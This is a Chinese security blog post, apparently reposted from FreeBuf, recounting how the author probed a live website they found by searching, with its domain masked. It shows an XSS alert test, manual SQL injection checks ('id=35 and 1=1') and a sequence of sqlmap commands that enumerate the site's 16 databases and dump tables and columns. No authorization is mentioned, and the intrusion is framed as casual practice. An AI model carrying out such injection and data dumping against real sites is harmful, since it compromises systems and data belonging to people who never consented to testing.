记录一次简单的web实战
2021-05-26 12:44:41 Author: www.freebuf.com(查看原文) 阅读量:88 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

盛年不重来,一日难再晨
在茫茫大海中,终于等到了你的到来!
在不断的搜索中,终于找到了一个“可爱啊”的网站,现在准备开饭了!
image.png在这就绕过信息收集这个步骤了,在初步拿到这个网站时,首先要注意网站的结构,server之类的。
BEGIN

在网站代码后面输入JaveaScript测试代码 ;出现弹窗,证明存在一个小的XSS,是否存在更多的XSS漏洞信息,以后再做补充。

image.png

除此之后,我们对其他漏洞页进去了测试,结果居然有了!!!

image.png

可以发现,存在数字型的SQL注入点;于是用了传统的方法对网站进行了sql测试

http://www.xxxxxx.net/main.php?id=35 and 1=1 ;http://www.xxxxx.net/main.php?id=35 or 1=1

image.png

虽然输入这个判断其可能存在注入点,但是还是需要进一步测试

现在我们用kali中的sqlmap进行扫描;

sqlmap -u http://www.xxxxxx.net/main.php?id=35

image.png

从扫描的结果可以知道,数据库为Mysql,Apach版本为2.0.47,PHP版本为5.1.4,属于高版本,由前面的知识点可以判定肯定存在'information_schema'这个数据库;

接下来,我们将查询该网站可能存在的其他数据库

sqlmap -u http://www.xxxxx.net/main.php?id=35 --dbs

image.png

我们可以看到,这个网站存在16个数据库,其中应该有我们想要看的东西(切记 只能看,不能改哟)

于是我进入到了刚才提到的‘information_schema'这个数据库中

第一:查看该数据库的所有表名 sqlmap -u http://www.xxxxx/main.php?id=35 -D information_schema --tables
image.png

第二:选择其中一个表,查看其字段 qlmap -u http://www.xxxxxx.net/main.php?id=35 -D information_schema -T TABLES --columns

image.png

第三:查看字段中的数据值 sqlmap -u http://www.xxxx.net/main.php?id=35 -Dinformation_schema -C TABLE_NAME -dump
image.png
image.png

既然这个网站存在一些漏洞,我们也得遵守法律,也就到这儿吧!


文章来源: https://www.freebuf.com/vuls/274512.html
如有侵权请联系:admin#unsafe.sh